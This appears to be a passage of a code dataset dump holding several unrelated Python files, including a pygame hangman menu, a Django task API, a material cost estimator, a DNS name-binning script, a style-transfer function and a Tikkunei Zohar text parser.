hour='12')\n# async def report_hns():\n \n# print(\"Waiting for coingecko...\")\n# ok, html = await Spider.render_html_with_splash('https://www.coingecko.com/en/coins/handshake')\n\n# if not ok:\n# return\n \n# def get_content(xpath):\n# try:\n# return html.xpath(xpath + \"/text()\")[0]\n# except:\n# return \"\"\n# usd = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[1]/span[1]\")\n# usd_d = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[1]/span[2]/span\")\n# btc = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[3]\")\n# btc_d = get_content(\"/html/body/div[2]/div[3]/div[4]/div[1]/div[2]/div[3]/span/span\")\n# l_24h = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[6]/td/span[1]\")\n# h_24h = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[6]/td/span[2]\")\n# l_7d = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[7]/td/span[1]\")\n# h_7d = get_content(\"/html/body/div[2]/div[3]/div[6]/div/div/div[2]/div/div[1]/div/div[1]/div[1]/div[2]/div[1]/table/tbody/tr[7]/td/span[2]\")\n\n# message = f\"\"\"{datetime.now(pytz.timezone('Asia/Shanghai'))}\n# HNS Hourly Report\n# USD: {usd} {usd_d}\n# BTC: {btc} {btc_d}\n# 24h Low/High: {l_24h}/{h_24h}\n# 7d Low/High: {l_7d}/{h_7d}\n# \"\"\"\n\n# bot = nb.get_bot()\n# await bot.send_msg(user_id=724463877, message=message)","sub_path":"nullbot/manager/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18087108","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = 'Chris Tyson'\nSITENAME = 'Chris Tyson'\nDESCRIPTION = \"Blog description.\"\nSITEURL = ''\nPATH = 'content'\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nDEFAULT_PAGINATION = True\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\nTHEME = \"monospace\"\n\nDIRECT_TEMPLATES = ['blog']\nPAGINATED_DIRECT_TEMPLATES = ['blog']\n\nSTATIC_PATHS = ['documents']\n#MD_EXTENSIONS = ['codehilite(noclasses=True, pygments_style=native)', 'extra']\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432503183","text":"import pygame\nfrom pygame.locals import *\nfrom sys import exit\nimport hangman_game\n\npygame.init()\n\ndef credits():\n pygame.init()\n\n transparent_bg = pygame.image.load('images/Backgrounds/imageedit_8_6964826368.png')\n menu_bg = pygame.image.load('images/Backgrounds/WallpaperDog-20392214(1).jpg')\n credits_text = pygame.image.load('images/Backgrounds/credits(fixed)(1).png')\n title = pygame.image.load('images/Text/text-1630917000711.png')\n return_icon = pygame.image.load('images/Icons/icons8-undo-50.png')\n\n click_sfx = pygame.mixer.Sound('SFX/WAV/salamisound-7509291-switch-turn-one-time-toggle.wav')\n soundtrack = pygame.mixer.music.load('SFX/WAV/salamisound-2382220-church-bell-bells-ringing-at.wav')\n pygame.mixer.music.play(-1)\n\n root = pygame.display.set_mode((730, 730))\n pygame.display.set_caption('Credits')\n\n run = True\n click = False\n\n while run:\n root.blit(menu_bg, (0, 0))\n root.blit(transparent_bg, (0, 0))\n root.blit(credits_text, (90, 90))\n root.blit(return_icon, (10, 10))\n root.blit(title, (251.5, 20))\n\n return_button_collide = pygame.Rect(10, 10, 50, 50)\n\n mx , my = pygame.mouse.get_pos()\n\n if return_button_collide.collidepoint((mx, my)):\n if click:\n click_sfx.play()\n main_menu()\n\n click = False\n \n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == MOUSEBUTTONDOWN:\n click = True\n\n pygame.display.update()\n\n pygame.quit()\n\n\ndef main_menu():\n \n bg = pygame.image.load('images/Backgrounds/WallpaperDog-20392214(1).jpg')\n grey_button = pygame.image.load('images/Buttons/CGB02-grey_M_btn.png')\n blue_button = pygame.image.load('images/Buttons/CGB02-blue_M_btn.png')\n play_text = pygame.image.load('images/Text/text-1630916444275.png')\n credits_text = pygame.image.load('images/Text/text-1630917000711.png')\n quit_text = pygame.image.load('images/Text/text-1630916779674.png')\n\n github_icon = pygame.image.load('images/Icons/icons8-github-40.png')\n gmail_icon = pygame.image.load('images/Icons/icons8-gmail-35.png')\n github_text = pygame.image.load('images/Text/text-1631459237095.png')\n gmail_text = pygame.image.load('images/Text/text-1631459278554.png')\n\n click_sfx = pygame.mixer.Sound('SFX/WAV/salamisound-7509291-switch-turn-one-time-toggle.wav')\n soundtrack = pygame.mixer.music.load('SFX/WAV/game-over-danijel-zambo-main-version-02-03-1394(1).wav')\n pygame.mixer.music.play(-1)\n\n root = pygame.display.set_mode((730, 730))\n pygame.display.set_caption('Menu')\n\n run = True\n click = False\n\n while run:\n root.blit(bg, (0, 0))\n\n root.blit(grey_button, (237, 100)) #PLAY\n root.blit(grey_button, (237, 250)) #CREDITS\n root.blit(grey_button, (237, 400)) #QUIT\n\n root.blit(github_icon, (10, 620))\n root.blit(github_text, (52, 631))\n\n root.blit(gmail_icon, (12, 670))\n root.blit(gmail_text, (51, 678))\n\n play_collide = pygame.Rect(237, 100, 256, 140)\n credits_collide = pygame.Rect(237, 250, 256, 140)\n quit_collide = pygame.Rect(237, 400, 256, 140)\n\n mx, my = pygame.mouse.get_pos()\n\n if quit_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 400))\n if click:\n pygame.quit()\n exit()\n\n elif play_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 100))\n if click:\n click_sfx.play()\n pygame.mixer.quit()\n hangman_game.game_loop()\n\n elif credits_collide.collidepoint((mx, my)):\n root.blit(blue_button, (237, 250))\n if click:\n click_sfx.play()\n credits()\n\n \n click = False\n\n root.blit(play_text, (301, 145.5))\n root.blit(credits_text, (251.5, 295.5))\n root.blit(quit_text, (294, 445.5))\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n\n if event.type == MOUSEBUTTONDOWN:\n click = True\n\n pygame.display.update()\n\n pygame.quit()\n\nmain_menu()","sub_path":"Linux/hangman_menu.py","file_name":"hangman_menu.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"606684073","text":"# coding=utf-8\n# import AnalysisRates as ar\n# import Estimate_1 as es1\nimport numpy as np\n# import LeadStatement as ls\nimport math as mt\nimport pandas as pd\nroyalty_sand=38.4\nroyalty_stone=138.3\n\npd.set_option('max_colwidth', 0)\npd.set_option('display.expand_frame_repr', False)\npd.set_option('display.precision', 2)\n\n\ndef conveyance(x):\n 'For conveyance of Rough stone, xetal, khoa, chips, moorum, earth and sand etc.(per 1cum.)'\n if x <= 5:\n return 156.4\n elif 5 < x & x <= 50:\n return 156.4 + (x - 5) * 9.2\n else:\n return 156.4 + 45 * 9.2 + 6.5 * (x - 50)\n\n\ndef conveyance_wood(x):\n 'For conveyance of wood of 1cum volume'\n if x <= 5:\n return 169.0 / 1.25\n elif 5 < x & x <= 50:\n return (169 + (x - 5) * 8.6) / 1.25\n else:\n return (169 + 45 * 8.6 + (x - 50) * 7.3) / 1.25\n\n\ndef conveyance_cement(x):\n 'For conveyance of wood of 1cum volume'\n if x <= 5:\n return 16.9\n elif 5 < x & x <= 50:\n return (16.9 + (x - 5) * 0.86)\n else:\n return (16.9 + 45 * 0.86 + (x - 50) * 0.73)\n\n\ndef conveyance_brick(x):\n 'Bricks of 25cm size for 1 no. '\n if x <= 5:\n return 1010.8 / 2000\n elif 5 < x & x <= 50:\n return (1010.8 + (x - 5) * 41.4) / 2000\n else:\n return (1010.8 + 45 * 41.4 + (x - 50) * 33.3) / 2000\n\n\nm = [['bricks', 1, 'local', 15, 3.38, 0], ['sand', 1, 'Mahanadi', 10, 55.0,royalty_sand],\n ['course sand', 1, 'Mahanadi', 10, 48.0,royalty_sand],\n ['cement', 1, 'Binka', 15, 622.00, 0], ['HYSD bar', 1, 'Binka', 15, 3800, 0], ['wood', 1, 'local', 5, 0, 0],\n ['stone', 1, 'Singijuba', 20, 254.0,royalty_stone], ['10mm c.b.g. chips', 1, 'Singijuba', 30, 1150, royalty_stone],\n ['12mm c.b.g. chips', 1, 'Singijuba', 30, 1150,royalty_stone],\n ['20mm c.b.g. chips', 1, 'Singijuba', 30, 1130,royalty_stone], ['40mm h.g. metal', 1, 'Singijuba',30, 780,royalty_stone],\n ['63mm h.g. metal', 1, 'Singijuba',20, 543, royalty_stone],['moorum',1,'Local',5,50,royalty_sand],['fly ash bricks',1,'local',15,4.2,0]]\n\n\ndef cost_of_material(mm, i, c=['Description', 'qty', 'quarry', 'lead', 'basic cost', 'Royalty']):\n table = pd.DataFrame(mm, index=i, columns=c)\n return table\na = cost_of_material([m[0]], [1])\na.insert(4,'conveyance',conveyance_brick(m[0][3]))\na['qty']=a['qty'].map('{:.0f}no'.format)\n\nb=cost_of_material([m[1]],[2])\nb.insert(4,'conveyance',conveyance(m[1][3]))\nb['qty']=b['qty'].map('{:.0f}cum'.format)\n\nc=cost_of_material([m[2]],[3])\nc.insert(4,'conveyance',conveyance(m[2][3]))\nc['qty']=c['qty'].map('{:.0f}cum'.format)\n\nd=cost_of_material([m[3]],[4])\nd.insert(4,'conveyance',conveyance_cement(m[3][3]))\nd['qty']=d['qty'].map('{:.0f}qtl'.format)\n\ne=cost_of_material([m[4]],[5])\ne.insert(4,'conveyance',conveyance_cement(m[4][3]))\ne['qty']=e['qty'].map('{:.0f}qtl'.format)\n\nf=cost_of_material([m[5]],[6])\nf.insert(4,'conveyance',conveyance_wood(m[5][3]))\nf['qty']=f['qty'].map('{:.0f}cum'.format)\n\ng=cost_of_material([m[6]],[7])\ng.insert(4,'conveyance',conveyance(m[6][3]))\ng['qty']=g['qty'].map('{:.0f}cum'.format)\n\nh=cost_of_material([m[7]],[8])\nh.insert(4,'conveyance',conveyance(m[7][3]))\nh['qty']=h['qty'].map('{:.0f}cum'.format)\n\ni=cost_of_material([m[8]],[9])\ni.insert(4,'conveyance',conveyance(m[8][3]))\ni['qty']=i['qty'].map('{:.0f}cum'.format)\n\nj=cost_of_material([m[9]],[10])\nj.insert(4,'conveyance',conveyance(m[9][3]))\nj['qty']=j['qty'].map('{:.0f}cum'.format)\n\nk=cost_of_material([m[10]],[11])\nk.insert(4,'conveyance',conveyance(m[10][3]))\nk['qty']=k['qty'].map('{:.0f}cum'.format)\n\nl=cost_of_material([m[11]],[12])\nl.insert(4,'conveyance',conveyance(m[11][3]))\nl['qty']=l['qty'].map('{:.0f}cum'.format)\n\nn=cost_of_material([m[12]],[13])\nn.insert(4,'conveyance',conveyance(m[12][3]))\nn['qty']=n['qty'].map('{:.0f}no'.format)\n\no=cost_of_material([m[13]],[14])\no.insert(4,'conveyance',conveyance_brick(m[13][3]))\no['qty']=o['qty'].map('{:.0f}no'.format)\n\n\n\n\nz = a.append(b).append(c).append(d).append(e).append(f).append(g).append(h).append(i).append(j).append(k).append(l).append(n).append(o)\nz.insert(7,'total cost',z['conveyance']+z['basic cost']+z['Royalty'])\n\n\n\nif __name__ == \"__main__\":\n z['total cost'] = z['total cost'].map('Rs.{:.2f}'.format)\n z['Royalty'] = z['Royalty'].map('Rs.{:.2f}'.format)\n z['basic cost'] = z['basic cost'].map('Rs.{:.2f}'.format)\n z['conveyance'] = z['conveyance'].map('Rs.{:.2f}'.format)\n z['lead'] = z['lead'].map('{:.0f}km'.format)\n\n print (z,'\\n\\n\\n','The lead of different materials as stated above is least and economical.')\n print ('\\n\\n\\n\\tJunior Engineer\\t\\tAssistant Engineer\\t\\tBlock Development Officer')\n print ('\\tBinka Block Office\\tBinka Block Office\\t\\t\\t\\tBinka')\n","sub_path":"LeadStatement1.py","file_name":"LeadStatement1.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"353828516","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport argparse\nimport traceback\nfrom decimal import Decimal\nfrom collections import defaultdict\nfrom log import ExtendEntry\nsys.path.append('python-tools')\nfrom input_handling import findNumber\nfrom group import UnsortedInputGrouper,Group\n\nclass IntervalGroup(Group):\n def __init__(self, tup):\n super(IntervalGroup, self).__init__(tup)\n self.bin = {1:defaultdict(int), 2:defaultdict(int), 3:defaultdict(int)}\n self.begin = -1\n self.count = 0\n\n def finishBin(self):\n if self.count == 0:\n return\n\n args.outfile.write(str(self.count) + ' ')\n for i in sorted(self.bin):\n if args.metric == 'max':\n if len(self.bin[i]) == 0:\n m = 0\n else:\n m = max(self.bin[i].iteritems(), key = lambda n: n[1])[1]\n elif args.metric == 'total':\n m = len(self.bin[i])\n args.outfile.write(str(m) + ' ')\n args.outfile.write('\\n')\n self.bin = {1:defaultdict(int), 2:defaultdict(int), 3:defaultdict(int)}\n self.count = 0\n\n def add(self, chunks):\n e = ExtendEntry.parseChunks(chunks)\n e.splits = list(reversed(e.query.question.rstrip('.').split('.'))) # Do not include the class or type\n\n if e.time - self.begin > args.bin:\n self.finishBin()\n self.begin = e.time\n\n self.count += 1\n for i in range(1,len(e.splits)+1):\n if i not in self.bin:\n self.bin[i] = defaultdict(int)\n self.bin[i]['.'.join(e.splits[:i])] += 1\n\n def done(self):\n self.finishBin()\n\nif __name__ == \"__main__\":\n # set up command line args\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\\\n description='Find similar requests in bins')\n parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'), default=sys.stdout)\n parser.add_argument('-b', '--bin', type=Decimal, default=Decimal('5'))\n parser.add_argument('-m', '--metric', choices=['max', 'total'], default='max')\n args = parser.parse_args()\n\n grouper = UnsortedInputGrouper(args.infile, IntervalGroup, [9], None)\n grouper.group()\n\n","sub_path":"scripts/similar_names_bin.py","file_name":"similar_names_bin.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"177814264","text":"import os\nimport torch\nfrom torch.autograd import Variable\nimport torchvision.utils as vutils\nimport time\n\ndef whiten_and_color(cF, sF):\n cF_size = cF.size()\n c_mean = torch.mean(cF, 1) \n c_mean = c_mean.unsqueeze(1).expand_as(cF)\n cF = cF - c_mean # center by subtracting mean vector\n # transform linearly to obtain feature maps that are uncorrelated\n content_conv = torch.mm(cF, cF.t()).div(cF_size[1] - 1) + torch.eye(cF_size[0]).double()\n c_u, c_s, c_v = torch.svd(content_conv,some=False)\n\n sF_size = sF.size()\n s_mean = torch.mean(sF, 1)\n s_mean2 = s_mean.unsqueeze(1).expand_as(sF)\n sF = sF - s_mean2 # center by subtracting mean vector\n # transform linearly to obtain feature maps that are uncorrelated\n style_conv = torch.mm(sF, sF.t()).div(sF_size[1] - 1)\n s_u, s_s, s_v = torch.svd(style_conv,some=False)\n \n k_c = cF_size[0]\n for i in range(cF_size[0]):\n if c_s[i] < 0.00001:\n k_c = i\n break\n\n k_s = sF_size[0]\n for i in range(sF_size[0]):\n if s_s[i] < 0.00001:\n k_s = i\n break\n\n c_d = (c_s[0:k_c]).pow(-0.5)\n step1 = torch.mm(c_v[:,0:k_c], torch.diag(c_d))\n step2 = torch.mm(step1, (c_v[:,0:k_c].t()))\n whiten_cF = torch.mm(step2, cF)\n\n s_d = (s_s[0:k_s]).pow(0.5)\n target_feature = torch.mm(torch.mm(torch.mm(s_v[:,0:k_s], torch.diag(s_d)), (s_v[:,0:k_s].t())), whiten_cF)\n t_mean = s_mean.unsqueeze(1).expand_as(target_feature) # mean vector of style\n target_feature = target_feature + t_mean # re-center with the mean vector of style\n return target_feature\n\ndef transform(cF, sF, csF, alpha):\n cF = cF.double()\n sF = sF.double()\n\n cF_view = cF.view(cF.size(0), -1)\n sF_view = sF.view(cF.size(0), -1)\n\n target_feature = whiten_and_color(cF_view, sF_view)\n target_feature = target_feature.view_as(cF)\n # after WCT, blend with the content feature before feeding it to the decoder \n ccsF = alpha * target_feature + (1.0 - alpha) * cF # alpha serves as the style weight for users to control the transfer effect\n ccsF = ccsF.float().unsqueeze(0)\n with torch.no_grad():\n csF.resize_(ccsF.size()).copy_(ccsF)\n return csF\n\n\n","sub_path":"src/wct.py","file_name":"wct.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"312880065","text":"\"\"\"\r\n100 days of Python course\r\nDAY 3\r\n\"\"\"\r\n\r\nnumber = int(input(\"Which number do you want to check? \"))\r\n\r\n# using the modulo function to see that after dividing, remainder is 0\r\n# this means that the number is divisible\r\nif number % 2 == 0:\r\n print(\"This is an even number.\")\r\n# Otherwise (number cannot be divided by 2 with 0 remainder).\r\nelse:\r\n print(\"This is an odd number.\")\r\n","sub_path":"odd_or_even.py","file_name":"odd_or_even.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323295319","text":"from django.http import JsonResponse\nfrom django.utils import timezone\nfrom ...models import HisHistory, TskTask\nfrom ...permission import Permission\nfrom .ApiResponse import ApiResponse\nfrom .Global import Global\n\n\nclass TasksId(Global):\n\n def get(self, request, id):\n\n tsk = TskTask.objects.get(id=id)\n\n # Valide si le user a les droits lecture sur le projets\n if tsk.pro_project.getPermission(self.User) < Permission.View:\n return ApiResponse.Generate401()\n\n response = tsk.to_dict()\n response['project'] = tsk.pro_project.to_dict()\n response['creator'] = tsk.usr_owner.to_dict()\n response['parents'] = []\n\n current = tsk\n while current.tsk_parent is not None:\n current = current.tsk_parent\n response['parents'].append(current.to_dict(recursive=False))\n\n return JsonResponse(response)\n\n def put(self, request, id):\n\n tsk = TskTask.objects.get(id=id)\n\n tmpLastState = tsk.state\n tsk.name = self.data.get('name', '')\n tsk.description = self.data.get('description', None)\n tsk.deadlineat = self.data.get('deadlineat', None)\n tsk.location = self.data.get('location', None)\n tsk.priority = self.data.get('priority', 0)\n tsk.state = self.data.get('state', 'NONE')\n tsk.order = self.data.get('order', '1')\n tsk.collapsed = self.data.get('collapsed', False)\n tsk.tsk_parent_id = self.data.get('tsk_parent', None)\n\n # Gestion du doneat\n if tmpLastState != 'DONE' and tsk.state == 'DONE':\n tsk.doneat = timezone.now()\n elif tsk.state != 'DONE':\n tsk.doneat = None\n\n # Valide si le user a les droits d'écirture sur le projets\n if tsk.pro_project.getPermission(self.User) < Permission.Edit:\n return ApiResponse.Generate401()\n\n # Valide la tache parent\n if tsk.tsk_parent_id is not None:\n\n if (tsk.tsk_parent.pro_project != tsk.pro_project or\n tsk.tsk_parent == tsk):\n return ApiResponse.Generate422('Data invalid: Parent task')\n\n tsk.save()\n HisHistory.log(\"PUT\", tsk, self.User)\n\n return JsonResponse({})\n\n def delete(self, request, id):\n\n tsk = TskTask.objects.get(id=id)\n\n # Valide si le user a les droits d'écirture sur le projets\n if tsk.pro_project.getPermission(self.User) < Permission.Edit:\n return ApiResponse.Generate401()\n\n HisHistory.log(\"DELETE\", tsk, self.User)\n tsk.delete()\n\n return ApiResponse.Generate204()\n","sub_path":"Focus/api/v1/TasksId.py","file_name":"TasksId.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"320965369","text":"from enum import Enum\nfrom itertools import count\nfrom collections import OrderedDict\nfrom docx2python import docx2python\n\nfrom sefaria.model import Ref\n\n\nclass Formatting(Enum):\n BOLD = 1\n ITALICS = 2\n BOLD_ITALICS = 3\n FADED = 4\n\n\nclass FootnoteType(Enum):\n CITATION = 1 # 2nd column\n SYMBOL = 2\n FOOTNOTE = 3\n INFINITY = 4\n STAR = 5\n TRIANGLE = 6\n ENDNOTE = 7\n DIAMONDS = 8 # second star\n\n\ndef get_symbol(footnote):\n if footnote.footnote_type == FootnoteType.INFINITY:\n return '∞'\n elif footnote.footnote_type == FootnoteType.STAR:\n return '☉'\n elif footnote.footnote_type == FootnoteType.DIAMONDS:\n return '☼'\n elif footnote.footnote_type == FootnoteType.TRIANGLE:\n return '△'\n elif footnote.footnote_type in [FootnoteType.FOOTNOTE, FootnoteType.ENDNOTE]:\n return footnote.footnote_number\n # elif footnote.footnote_type == FootnoteType.CITATION:\n # # post citation\n # return None\n else:\n return None\n\n\ndef get_tag(formatting_type, opening_tag=True):\n if not formatting_type:\n return ''\n attributes = None\n if formatting_type == Formatting.BOLD:\n tags = ['b']\n elif formatting_type == Formatting.FADED:\n tags = ['span']\n attributes = 'class=\"mediumGrey\"'\n elif formatting_type == Formatting.ITALICS:\n tags = ['i']\n elif formatting_type == Formatting.BOLD_ITALICS:\n tags = ['b', 'i']\n\n tag_string = ''\n for tag in tags:\n tag_string += f'<{\"/\" if not opening_tag else \"\"}{tag}{\" \" + attributes if attributes and opening_tag else \"\"}>'\n return tag_string\n\n\ndef strip_symbol(to_strip): # TODO: move into HtmlParser if HTML based\n for symbol in ['∞', '', '']:\n to_strip = to_strip.replace(symbol, '')\n return to_strip\n\nclass Word(object):\n \"\"\"Word in the Solomon Tikkunei Zohar\"\"\"\n ids = count(0)\n\n def __init__(self, text, phrase, line, paragraph, daf, tikkun, footnotes=[]):\n self.id = next(self.ids)\n self.text = text\n self.phrase = phrase\n self.line = line\n self.paragraph = paragraph\n self.daf = daf\n self.tikkun = tikkun\n self.footnotes = []\n\n def add_to_word(self, str):\n self.text += str\n\n def add_new_footnote(self, footnote_type, formatting, footnote):\n footnote = Footnote(footnote_type, formatting, self, footnote)\n self.footnotes.append(footnote)\n return footnote\n\n\nclass Phrase(object):\n \"\"\"1 or more words formatted a particular way\"\"\"\n\n def __init__(self, formatting, line, paragraph, daf, tikkun):\n self.words = []\n self.footnotes = []\n self.line = line\n self.paragraph = paragraph\n self.daf = daf\n self.tikkun = tikkun\n self.formatting = formatting\n\n def add_new_word(self, text, footnotes=[]):\n new_word = Word(text, self.line, self.paragraph, self.daf, self.tikkun, footnotes)\n self.words.append(new_word)\n self.line.words.append(new_word)\n self.paragraph.words.append(new_word)\n # new_word.text)\n return new_word\n\n def add_word_or_phrase(self, word_or_phrase):\n self.word_or_phrases.append(word_or_phrase)\n\n\nclass Quoted(object):\n def __init__(self, paragraph, daf, tikkun):\n self.words = []\n self.footnotes = []\n # self.line = line\n self.paragraph = paragraph\n self.daf = daf\n self.tikkun = tikkun\n self.complete = False\n\n def add_word(self, word):\n self.words.append(word)\n\n def end_quote(self):\n self.complete = True\n\n def is_complete(self):\n return self.complete\n\n def add_footnote(self, footnote):\n self.footnotes.append(footnote)\n\n\nclass Line(object):\n \"\"\"Ordered phrases\"\"\"\n\n def __init__(self, paragraph, daf, tikkun, line_number):\n self.phrases = []\n self.paragraph = paragraph\n self.daf = daf\n self.words = []\n self.tikkun = tikkun\n self.line_number = line_number\n\n def add_new_phrase(self, formatting):\n phrase = Phrase(formatting, self, self.paragraph, self.daf, self.tikkun)\n self.phrases.append(phrase)\n self.paragraph.phrases.append(phrase)\n self.daf.phrases.append(phrase)\n self.tikkun.phrases.append(phrase)\n return phrase\n\n\nclass Paragraph(object):\n \"\"\"Multiple lines grouped together\"\"\"\n\n def __init__(self, tikkun, daf, paragraph_number):\n self.lines = []\n self.phrases = []\n self.footnotes = []\n self.quoted = []\n self.words = []\n self.he_words = None\n self.quoted_cursor = []\n # self.inside_quotes = False\n self.enter_quotes_on_next_word = False\n self.exit_quotes_on_next_word = False\n self.tikkun = tikkun\n self.daf = daf\n self.paragraph_number = paragraph_number\n self.line_number = count(0)\n\n def add_new_line(self):\n line = Line(self, self.daf, self.tikkun, next(self.line_number))\n self.lines.append(line)\n self.tikkun.lines.append(line)\n self.daf.lines.append(line)\n return line\n\n def add_new_quoted(self):\n self.quoted_cursor.append(Quoted(self, self.daf, self.tikkun))\n # self.inside_quotes = True\n # self.enter_quotes_on_next_word = True\n\n def commit_quoted(self):\n if len(self.quoted_cursor) == 0:\n # print(\"End Quote Only\")\n # print(self.words[-1].text)\n pass\n else:\n # print([word.text for word in self.quoted_cursor[-1].words])\n self.quoted.append(self.quoted_cursor[-1])\n # self.inside_quotes = False\n self.quoted_cursor.pop()\n\n # self.exit_quotes_on_next_word = True\n\n def add_to_quoted_if_in_quotes(self, word):\n # if len(self.quoted_cursor) > 0:\n for quote in self.quoted_cursor:\n quote.add_word(word)\n\n ref_replace_dict = {\n \"Naḥ\": \"Nah\",\n \"Naḥ.\": \"Nah\",\n \"Ḥab\": \"Hab\",\n \"Lev.\": \"Lev\",\n \"Ez.\": \"Ezekiel\",\n \"1 King.\": \"1 Kings\",\n \"2 King.\": \"2 Kings\",\n \"Jer.\": \"Jeremiah\",\n \"Ez\": \"Ezekiel\",\n }\n\n def get_links(self):\n links = []\n for footnote in self.footnotes:\n if footnote.footnote_type == FootnoteType.CITATION:\n ref1 = 'Tikkunei Zohar ' + self.daf.name + ':' + str(self.paragraph_number + 1)\n try:\n for key, value in self.ref_replace_dict.items():\n if footnote.text.startswith(key):\n footnote.text = footnote.text.replace(key, value, 1)\n footnote.text.replace('see: ', '')\n footnote.text.replace('see ', '')\n break\n ref2 = Ref(footnote.text)\n links.append({\"refs\": [ref1, str(ref2)], \"type\": \"Citation\", \"auto\": True, \"generated_by\": \"solomon_tz_parse_nm\"})\n except:\n print('failed to parse ref ' + footnote.text)\n return links\n\n def get_words(self):\n words = ''\n for line in self.lines:\n for phrase in line.phrases:\n # for word in phrase.words:\n words_in_phrase = ''\n for word in phrase.words:\n if words_in_phrase != '':\n words_in_phrase += ' '\n else:\n words_in_phrase += get_tag(phrase.formatting)\n words_in_phrase += word.text\n for footnote in word.footnotes:\n if type(footnote.anchor) is Word:\n anchor = footnote.anchor.text\n else: # Phrase\n anchor = ' '.join([word.text for word in footnote.anchor.words])\n footnote_symbol = get_symbol(footnote)\n if footnote_symbol:\n words_in_phrase += '' + footnote_symbol + '' +\\\n '' \\\n + '' + strip_symbol(footnote.text) + ''\n else:\n # TODO: handle other footnote types\n pass\n words_in_phrase += get_tag(phrase.formatting, False)\n # words_in_phrase = ' '.join([word.text for word in phrase.words])\n if words != '':\n words += ' '\n words += words_in_phrase\n words += '
'\n words.rstrip('
')\n # for footnote in phrase.footnotes:\n\n return words\n\n # def add_to_quoted_if_necessary(self, word):\n # if self.inside_quotes or self.enter_quotes_on_next_word:\n # self.quoted_cursor[-1].add_word(word)\n # self.inside_quotes = True\n # self.enter_quotes_on_next_word = False\n # if self.exit_quotes_on_next_word:\n # self.inside_quotes = False\n # self.exit_quotes_on_next_word = False\n\n\nclass Daf(object):\n def __init__(self, name):\n self.name = name\n self.he_name = None\n self.lines = []\n self.paragraphs = []\n self.phrases = []\n self.footnotes = []\n self.paragraph_number = count(0)\n\n\nclass Tikkun(object):\n def __init__(self, name, number):\n self.words = []\n self.paragraphs = []\n self.he_name = None\n self.lines = []\n self.phrases = []\n self.footnotes = []\n self.name = name\n self.number = number\n\n\nclass Footnote(object):\n def __init__(self, footnote_type, formatting, anchor=None, text=''):\n self.anchor = anchor\n self.text = text\n self.footnote_type = footnote_type\n self.footnote_number = None\n self.formatting = formatting\n\n\nclass TikkuneiZohar(object):\n def __init__(self):\n self.tikkunim = []\n self.dapim = []\n\n# do we need the\n","sub_path":"sources/tikkunei_zohar/tz_base.py","file_name":"tz_base.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143718136","text":"from flask_restful import Resource\nfrom model.Database import User, Language, Framework, Ide, OS\n\n\nclass Result(Resource):\n @classmethod\n def get(cls):\n print(len(User.query.all()))\n '''\n objective is to create an array which carry the value associated with each of the entries\n the find the average of each of the value which gives us the answer of the survey\n \n '''\n count = 0\n count1 = 0\n language_array = [0]*len(Language.query.all()) # method to create an array of respective parameters with value 0\n framework_array = [0]*len(Framework.query.all())\n ide_array = [0]*len(Ide.query.all())\n os_array = [0]*len(OS.query.all())\n\n for user in User.query.all():\n count += 1\n for language in Language.query.all():\n if language.language_name == user.language:\n language_array[count1] = language_array[count1]+1\n break\n count1 += 1\n count1 = 0\n for framework in Framework.query.all():\n if framework.framework_name == user.framework:\n framework_array[count1] = framework_array[count1] + 1\n break\n else:\n count1 += 1\n count1 = 0\n for ide in Ide.query.all():\n if ide.ide == user.ide:\n ide_array[count1] = ide_array[count1] + 1\n break\n else:\n count1 += 1\n count1 = 0\n for os in OS.query.all():\n if os.os == user.os:\n os_array[count1] = os_array[count1] + 1\n break\n else:\n count += 1\n '''\n now to render the value of the result i again have to create a string array \n '''\n language_string = ['']*len(Language.query.all())\n framework_string = ['']*len(Framework.query.all())\n ide_string = ['']*len(Ide.query.all())\n os_string = ['']*len(OS.query.all())\n\n 